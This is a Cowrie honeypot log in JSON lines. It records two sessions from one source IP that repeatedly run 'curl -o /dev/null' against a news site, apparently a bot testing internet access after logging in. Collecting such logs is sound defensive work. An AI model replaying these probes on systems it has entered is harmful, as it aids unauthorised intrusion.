{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.679113Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.702257Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.703847Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.708700Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.709839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.710862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.716256Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.730080Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.745291Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.746527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.749356Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.750333Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.767278Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.785517Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.786991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.791372Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.793155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.798926Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.805921Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.826602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.828221Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.836073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.837594Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.847948Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.868197Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.869684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.875415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.876951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.883365Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.886256Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.899781Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.908063Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.909813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.918461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.920533Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.922444Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.928962Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.935584Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.948599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.950151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.970615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.972675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.982412Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.985093Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.993381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.994654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.012776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.014308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.017102Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.024756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.044237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.046157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.059314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.061364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.066150Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.092020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.093478Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.098740Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.102031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.103485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.112858Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.133660Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.136430Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.137434Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.142646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.144157Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.150698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.174389Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.177702Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.178894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.184851Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.185852Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.190550Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.199969Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.219812Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.221284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.226267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.228779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.230461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.240448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:02.249532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:02.260909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
